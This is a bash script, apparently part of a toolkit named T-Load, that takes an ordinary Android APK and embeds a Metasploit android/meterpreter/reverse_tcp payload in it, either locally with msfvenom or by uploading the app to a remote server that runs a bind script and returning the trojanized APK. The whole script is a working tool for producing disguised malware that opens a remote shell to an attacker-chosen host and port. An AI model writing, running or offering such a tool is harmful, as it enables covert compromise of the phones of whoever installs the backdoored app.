source $HOME/T-Load/host
source $HOME/T-Load/skstool
if [ -e $HOME/T-Load/tload ]
then
echo "Embed is closed until V9 is released. Stay tuned"
exit
fi
dir=$HOME/T-Load
clear
echo " Enter the path to the original apk WITH .apk extension."
read -p ">|" upath
echo ""
echo " Enter the download path with the final name with .apk extension "
read -p ">|" dpath
echo ""
echo "Enter the host"
read -p ">|" vh
echo ""
echo "Enter the port"
read -p ">|" vp
echo ""
echo "Select payload generation option"
echo "1. Embed Payload from your device"
echo "2. Embed Payload from server (Avoids Errors, High embed speed)"
echo "3. Go back to main menu"
read -p ">|" em

#############################
## Embed payload in device ##
#############################

if [ $em = "1" ]
then
clear
msfvenom -x $upath -p android/meterpreter/reverse_tcp LHOST=$vh LPORT=$vp -o $dpath
echo ""
echo ""
echo "Press enter to continue to main menu"
read garbage
skstool

###############################
## Embed payload from server ##
###############################

elif [ $em = "2" ]
then
################
## Upload apk ##
################
clear
echo "Press Enter to upload your app or [ctrl + c] to exit"
read garbage
rsync -r -v --progress -e "ssh -i $dir/key -o StrictHostKeyChecking=no" $upath sathvik@$host:/home/sathvik/payload
sleep 3

###########
## Embed ##
###########
clear
echo "Press Enter to embed your app or [ctrl + c] to exit"
clear
ssh -o StrictHostKeyChecking=no -i $dir/key sathvik@$host -t "sudo bind.sh $vh $vp $oapp $fapp"
sleep 3

##################
## Download apk ##
##################
clear
echo "Press Enter to upload your app or [ctrl + c] to exit"
rsync -r -v --progress -e "ssh -i $dir/key -o StrictHostKeyChecking=no" sathvik@$host:/home/sathvik/embed/$fapp $dpath
echo
echo "If there was no error seen while downloading, then you app has been downloaded to "$dpath " with a name "$dname
sleep 5
skstool
elif [ $embc = "3" ]
then
skstool
else
clear
echo "Wrong Choice"
sleep 3
$dir/embed
fi
